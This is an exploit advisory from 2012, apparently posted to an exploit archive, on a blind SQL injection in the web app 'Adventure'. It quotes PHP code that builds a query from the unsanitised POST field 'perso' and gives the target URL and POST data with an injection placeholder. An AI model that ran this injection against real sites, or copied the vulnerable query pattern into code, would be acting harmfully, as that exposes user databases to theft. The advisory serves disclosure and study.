facebook facebook twitter rss

Adventure - Blind SQL Injection

Author: The UnKnØwN , Published: 21-09-2012
+-----------------------------------------------------------------------------+
¦ Adventure - Blind SQL Injection ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__) ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - BenzØ - Soka - Hony - Pincki - ¦
¦ Linkce16 - Mooh Splinter - The Spark - F3i ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : Adventure - Blind SQL Injection ¦
¦ [+] date : 05-07-2012 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] software link :http://www.mediafire.com/?ui176j05x53ydq3 ¦
¦ [+] version : 1 ¦
¦ [+] category : webapps ¦
¦ [+] tested on : windows xp ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ Unprotected POST variable in "/vip_validation.php" ¦


if (isset($_POST['send_vip']) && $_POST['send_vip'] == 'Valider')
{
$req = $db_accounts->prepare("SELECT * FROM accounts WHERE guid='".$_SESSION['id']."' ");
$req->execute();
$id = $_SESSION['id'];
foreach($req as $data)
{
$guid_account = $data['guid'];
$recupPts = $data['points'];
}
$personnage = $_POST['perso'];
$reqp = $db_accounts->prepare("SELECT * FROM personnages WHERE guid='$personnage'");
$reqp->execute();




URL : http://site/path/vip_validation.php
POST DATA : send_vip=Valider&perso={Inject}



¦ ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+

Like us on Facebook :